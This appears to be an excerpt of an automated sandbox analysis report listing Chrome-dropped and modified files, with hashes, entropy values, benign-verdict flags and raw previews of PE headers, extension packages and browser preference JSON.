                                                              SHA1:55B90405F1E1B72143C64113E8BC65608DD3FD76
                                                              SHA-256:82AA3FD6A25CDA9E16689CFADEA175091BE010CECAE537E517F392E0BEF5BA0F
                                                              SHA-512:B62F6501CB4C992D42D9097E356805C88AC4AC5A46EAD4A8EEE9F8CBAE197B2305DA8AAB5B4A61891FE73951588025F2D642C32524B360687993F98C913138A0
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Reputation:moderate, very likely benign file
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;....zp..zp..zp...s.qzp...u..zp...t.\zp...s.izp...u.;zp...t.gzp...q.fzp..zq..{p...y.Ezp.....~zp..z..~zp...r.~zp.Rich.zp.................PE..L....a|b.................V..........|........p....@.......................... ......vI....@.................................Tl..........p2...............#...... $...\..T...........................(]..@............p..H............................text....U.......V.................. ..`.rdata.......p.......Z..............@..@.data...d'...........j..............@....rsrc...p2.......4...x..............@..@.reloc.. $.......&..................@..B................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe
                                                              File Type:Google Chrome extension, version 3
                                                              Category:dropped
                                                              Size (bytes):145035
                                                              Entropy (8bit):7.995615725071868
                                                              Encrypted:true
                                                              SSDEEP:3072:TdgEhmDf+E8VY0x81Rkc6L2oqzqkPEu30gZlc3G2ZknF:TyEhmDf+/+Fnkj6lEukgZyyF
                                                              MD5:EA1C1FFD3EA54D1FB117BFDBB3569C60
                                                              SHA1:10958B0F690AE8F5240E1528B1CCFFFF28A33272
                                                              SHA-256:7C3A6A7D16AC44C3200F572A764BCE7D8FA84B9572DD028B15C59BDCCBC0A77D
                                                              SHA-512:6C30728CAC9EAC53F0B27B7DBE2222DA83225C3B63617D6B271A6CFEDF18E8F0A8DFFA1053E1CBC4C5E16625F4BBC0D03AA306A946C9D72FAA4CEB779F8FFCAF
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b..........S'.....2.{.....'....+.'.."..Y.x.ISa...)....H.&92..?!..~..F.5."...n,.B.-|\.)..(..... ]G..j.-M)....C......o&L..0.K.....UtP.&.N...;..^w/a{)v...~KG;...?.1...k.c..D.U......J.6.`.G.5.x.k..[...i.A.@I^..I.<A. J...j.'.G.`.$q.N..Tdq]2]p.OF..#.#......'....8.3......0.."0...*.H.............0.............O..(...':19..O/.>....=.....m.n\.z..q.....JW..F......+H.Z+KGO.9....8.....U...&.y....,$...?.Eo.....\f/.Z..+M8...B.3'..Y.r...X.AS?.~..k..n....... Z...&.G....."n..........l.0v.x#<....Lx,-.w..-..d.....J.pT..('e~*{%kQ.Q......rI.....Z....v.N.....J.d_......rX.......w@.b.[.c../V.'c...!.~.k..}z...U.S..nC......@.......Y..#.D.z.....5&.1O...X=p..2.F..P.6yP..>{.....HBX.*.E5....y..
                                                              Process:C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):1772
                                                              Entropy (8bit):6.019907048086037
                                                              Encrypted:false
                                                              SSDEEP:48:p/hPGxBJ7akeSpKssMLgWuG7bmTkfhs8vox:R9i7aaKssMUWuG7biIQx
                                                              MD5:35C7E305A06F30D3F0A97693C3504265
                                                              SHA1:B30C965F53A93676CC9D87D29F5E6AC5B605DD84
                                                              SHA-256:3B6FB2683B4DFD83FDD0C6EE096F378AA85C6B1ACC73EC66288802A71C9381F7
                                                              SHA-512:A6AC0DDC3C99D59A2C667410FE94BB8F267D1CF422C337FEBCFBAE23D5C965B0E965FF0B77FC88FA9E7B06EE6CE6D532B6ECB0D87A53FB282260EF812379EB7C
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJDaHJvbWVSZWNvdmVyeS5leGUiLCJyb290X2hhc2giOiJVUTRsOWhOY3VCS21lc2Utakd2ZE52X1VCWXFTTWNpTGZQM3pxZ2tnXy0wIn0seyJwYXRoIjoibWFuaWZlc3QuanNvbiIsInJvb3RfaGFzaCI6IjBhd25UUEVCZ0NEeTJXTmFVWTdSb2ZJY3dzdnA0cVE1THNlUzFVdGJVdjQifV0sImZvcm1hdCI6InRyZWVoYXNoIiwiaGFzaF9ibG9ja19zaXplIjo0MDk2fV0sIml0ZW1faWQiOiJmcGplb2FkbWdlZGFqcGxtcG9hYWprY2hkb2ZjbHBrZiIsIml0ZW1fdmVyc2lvbiI6IjEuMy4zNi4xNDEiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"ef1pxaTj-_-MaYe95eLdI4WHEPJq4PB7n1seVNh9AxlAGhDeKZD2PDPdzEYwLEXP6d3DCgNBaZDMZeByzQbRob9fSKBwHKzITZC0ScxWJTc8DuWlYfQdRMTrzxr_7S1FVvRx4Fxi7FFg921RIa7d2zXCGnA8qIvfUzYBU0TYoMeo--GC5JmJGpwrDi_9Xq0saxXUViu8o7Vlbul2ZEFLNMpHSfafBFLJVD_0cJc5arSdhdEVdAW1MztVSQ8CFfKhci2LBn3fKihN2_klwBKfbfmzKNm5aLoOf_iG3hjIoLji8dcxYo5sYXugJENpRrs-_AclQKykKKuD8wi45RK
                                                              Process:C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):195
                                                              Entropy (8bit):4.682333395896383
                                                              Encrypted:false
                                                              SSDEEP:3:rR6TAulhFphifFJ9LAG9Xg0XTFHqS1wP/pEeSWU4pv/8F/FxLj2RF2fcTZTotL:F6VlM90ggITgS1wnuWfB0NpK4aotL
                                                              MD5:7A8E3A0B6417948DF4D49F3915428D7A
                                                              SHA1:4FC084AABDB13483567D5C417C7ED8FD16726A80
                                                              SHA-256:D1AC274CF1018020F2D9635A518ED1A1F21CC2CBE9E2A4392EC792D54B5B52FE
                                                              SHA-512:064D84A57B28C19AD10742859DA493D0826B47ADC632F6C623DFB4DE36D72A9D29BE98518061A9FFD42D99FCF01F27DE39CE74782B3A5ACBBE11DFDDEEAB59A1
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:{. "manifest_version": 2,. "name": "ImprovedRecoveryComponentInner",. "version": "1.3.36.141",. "imageName": "image.squash",. "squash": true,. "fsType": "squashfs",. "isRemovable": false.}
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):207994
                                                              Entropy (8bit):6.072256637605032
                                                              Encrypted:false
                                                              SSDEEP:6144:FU03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:FnCW8D2FmvoL
                                                              MD5:801FC8D6CC0A7EBD956E86300E250E47
                                                              SHA1:BEEB2ADDEAEAA305ED93C096AF63DA047EB9E7AA
                                                              SHA-256:A61923AC1B2536A7B194903506F5457A6831D472A605BCB833653D6BF390D63D
                                                              SHA-512:0D535722BD551A045BBFBD81CC96DF3F0252B9E2DD1ACB7BF1AC1C41072A892DB3D0E1D6294C7FFAC6B555716946110FD09740CCB2F51D8D10D6067E0998862F
                                                              Malicious:false
                                                              Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245922715401452"},"plugins":{"metadata":{"adobe-flash-player":{"d
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:modified
                                                              Size (bytes):199748
                                                              Entropy (8bit):6.0448124575828155
                                                              Encrypted:false
                                                              SSDEEP:6144:q03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:VCW8D2FmvoL
                                                              MD5:E60DFC6596AD4631983715C4A3CEE81B
                                                              SHA1:C7B33855C3A64BE8D464586EAD7B146002C64043
                                                              SHA-256:F52BB3FF9E9536A4BD26066BBB3E84D299D4FBFAED2A062A2B62128663F323B3
                                                              SHA-512:D8AA2F3E04A2E573BCDD994A853EC358CE2ABC62D5A82513CA7926BAE64EF72228ECF95BA21FE6C73CAC43943C04DCA5D9B1C7411B9F3E812F996BE66628FE3E
                                                              Malicious:false
                                                              Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291206129529003"},"plugins":{"metadata":{"adobe-flash-player":{"d
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):199645
                                                              Entropy (8bit):6.044540100232156
                                                              Encrypted:false
                                                              SSDEEP:6144:y03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:9CW8D2FmvoL
                                                              MD5:DBBBDCB7A4EC0FD857BBAC7314921BAD
                                                              SHA1:BA35AA951DC9EEFED613BE5555E4D5E0451859B8
                                                              SHA-256:3E6DCBB0EB676F58C644DC7FD22AC795C6E6B4C313FDC00AF364612BC90F06A7
                                                              SHA-512:81B3CFCA7B3A4876C876ACCF689ED67036E6F47DDDD42FF435010A1C9417717398413A1692B91DD0305E8C75BEA84FE1D56635C6A64ECFCB2B77B0FC86316F34
                                                              Malicious:false
                                                              Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291206129529003"},"plugins":{"metadata":{"adobe-flash-player":{"d
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):207994
                                                              Entropy (8bit):6.072254559988753
                                                              Encrypted:false
                                                              SSDEEP:6144:co03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:c7CW8D2FmvoL
                                                              MD5:3CFA9F1C33D6AC2C2E97F6DBD4F9658A
                                                              SHA1:731DEF14B8D5E7B97A187B9C678056AE1C7E83C4
                                                              SHA-256:F105D920599551975F0BC5FEF6D12D9EC8C86BFEFEFC4BB1493FD9EB987DAB19
                                                              SHA-512:759F25BD0B16D9BD1A26A3FF21A4B2C933C04C9982A537D9B70DDC2A42BFA512C54E3BF583728405F120F3B9E4143F0C1A46B7EE52D833F917A6A2678DA2C80C
                                                              Malicious:false
                                                              Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291206129529003"},"plugins":{"metadata":{"adobe-flash-player":{"d
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):101472
                                                              Entropy (8bit):3.750555934697916
                                                              Encrypted:false
                                                              SSDEEP:384:WDN2icDtD2c7ClN+r7vSEr3Baw5HUtGFMrX7aFberxmASI4srrT2mP7F30GGK1OL:2y1pCwQhcerj5UklPzOmKgqy5+
                                                              MD5:8861B480816CFF914C2C00518E1E1C09
                                                              SHA1:A77536EBF40CABC12A9612B6591C9712A3DB686B
                                                              SHA-256:2AA0D5D60E5CC37623EA71A91641910AF5C0F419A9AC2E864738BC465CBA64C8
                                                              SHA-512:412F1FF970CB109118E0721CC168C64FE79699A50ECCAEE47B857D257794DD44BFFD9C7389BD8C03F57BBA949FFD0D186BAC77B4F0A9509E6624E7AC1BE9687C
                                                              Malicious:false
                                                              Preview:\...............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....^8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):93504
                                                              Entropy (8bit):3.750083187912697
                                                              Encrypted:false
                                                              SSDEEP:384:nDN2icDtcc7ClN+r7vSa3Baw5HUtGFMrXkiExZI4srrT2mP030GGK1OwEGNb12fG:byVpCg1hceL4UkQPzOmKgqy5H
                                                              MD5:F924BA2622816FE209F613DC017F65C1
                                                              SHA1:AF5DD8C7CFCD6A22E498DC05E7858AD4C43D10DD
                                                              SHA-256:FA3B34E516CA700CDFA53C1ECCF34A18222637B740F211A98BE701AA94618D3B
                                                              SHA-512:82113A6CC977B710B535925B2DFE3ABF11B699BD00C1C1A5423CE8C006D7103DF28B3847E6BAED05017AE234A6350C0A255D6C08477BA4A2937A9E17EEF83A28
                                                              Malicious:false
                                                              Preview:<m..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....^8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):40
                                                              Entropy (8bit):3.3041625260016576
                                                              Encrypted:false
                                                              SSDEEP:3:FkXwgs0oRLn:+taRLn
                                                              MD5:7AE9008C2AA5ED3E5ED52743E082F5BF
                                                              SHA1:CD90099842F51474494BFC490433578A89C1B539
                                                              SHA-256:94E7D9BF431A0E3F0FD02F0FBA7321F43DD8B523E3D32092AFC474D3FD5ABF62
                                                              SHA-512:596E66D10186ADAD552F4CF7E74CD438AD19AF4C30950D2D6EB80E9F9430CA475D12BB79423EC8D15EAF37ABE0AD1DCCAE459C356A00055A82155C24A35C6F14
                                                              Malicious:false
                                                              Preview:sdPC.....................UO..E.D.Q.o....
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):4899
                                                              Entropy (8bit):4.935931533909383
                                                              Encrypted:false
                                                              SSDEEP:48:Yc1kKSChkliFqARiqTlYGlQKHoTw0jrf4MqM8C1Nfct/9BhUJo3KhmeSnpNGzFen:nVLK61pIKI95k0JCKL8bbOTlVuHn
                                                              MD5:049739E195E83C219E1C7C39F7E074A4
                                                              SHA1:A3C132A7398223DBD1D653C11F68877A3950A7BC
                                                              SHA-256:DF8621B9883E4723107312D2697F69B5408347D9C9A386ED8914395AF165C8C2
                                                              SHA-512:7AB1F16D98BFAC5E43975F13ED63FE86B30FD10583F7D8976F069989D3B6F2B7F025A49869831DDC799EC2ECC270AEF1C48FDD1BF7F431CEDCB11D6E5D60D76E
                                                              Malicious:false
                                                              Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13298721015354457","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245924509391818","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"bookmark_bar":{"show_on_all_tabs":false},"browser":{"default_browser_infobar_last_declined":"13245924607060180","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2042016"],"daily_recei
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:modified
                                                              Size (bytes):1518
                                                              Entropy (8bit):4.8062213955365065
                                                              Encrypted:false
                                                              SSDEEP:24:Y26aL3M33ayFGRaXa63aDaaraqavatZa+RdsdydR/RdsdrJdMHQmQYhbG7n/iy:Y2nzM3qyvK6qDHGXCtwWs+RLs9zMHSYm
                                                              MD5:10E45841166C3E8A4EC4EC7640B300FF
                                                              SHA1:F57A740BB8FE6979AD50DB1A587B3AD06240CCA9
                                                              SHA-256:3CF57024965FD1EA05D3AC849FF5538CBECC6086382F9825CC9345261C325C31
                                                              SHA-512:27BF5F7B7D5457EE5BF1977B04E0FFCA941832518CECA65DD07F94CEC93E75B018432E6389CFAB582D7019BC57A15FEBB7C02BC78307DA711476259592EC82D0
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://www.google.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"isolation":[],"server":"https://redirector.gvt1.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expi
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:L:L
                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                              Malicious:false
                                                              Preview:.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):4899
                                                              Entropy (8bit):4.9374220871086525
                                                              Encrypted:false
                                                              SSDEEP:48:Yc1kKSChkli2qAOiqTlYGlQKHoTw0jrf4MqM8C1Nfct/9BhUJo3KhmeSnpNGzFen:nVLFt1pIKI95k0JCKL8bbOTlVuHn
                                                              MD5:28A9342C8118982B560CE098526B7976
                                                              SHA1:A779DB4CD7CF16245C5361EAD894BA8714EEBBF0
                                                              SHA-256:852090A12063898D319F4E530617EC661F390EC9991F5F30C5F5A4C06EF30196
                                                              SHA-512:C10EF54CA437C793AA314EDFA2F0883225ADCD51987D058CFE5BA008F67A1CC76873B542334BAEE329196DC9AAFCE8A0C83EC7570FB5F6839AAFF0A484261773
                                                              Malicious:false
                                                              Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13298721015354457","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245924509391818","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"bookmark_bar":{"show_on_all_tabs":false},"browser":{"default_browser_infobar_last_declined":"13245924607060180","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2042016"],"daily_recei
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):4899
                                                              Entropy (8bit):4.935931533909383
                                                              Encrypted:false
                                                              SSDEEP:48:Yc1kKSChkliFqARiqTlYGlQKHoTw0jrf4MqM8C1Nfct/9BhUJo3KhmeSnpNGzFen:nVLK61pIKI95k0JCKL8bbOTlVuHn
                                                              MD5:049739E195E83C219E1C7C39F7E074A4
                                                              SHA1:A3C132A7398223DBD1D653C11F68877A3950A7BC
                                                              SHA-256:DF8621B9883E4723107312D2697F69B5408347D9C9A386ED8914395AF165C8C2
                                                              SHA-512:7AB1F16D98BFAC5E43975F13ED63FE86B30FD10583F7D8976F069989D3B6F2B7F025A49869831DDC799EC2ECC270AEF1C48FDD1BF7F431CEDCB11D6E5D60D76E
                                                              Malicious:false
                                                              Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13298721015354457","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245924509391818","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"bookmark_bar":{"show_on_all_tabs":false},"browser":{"default_browser_infobar_last_declined":"13245924607060180","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2042016"],"daily_recei
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):19796
                                                              Entropy (8bit):5.56403969144979
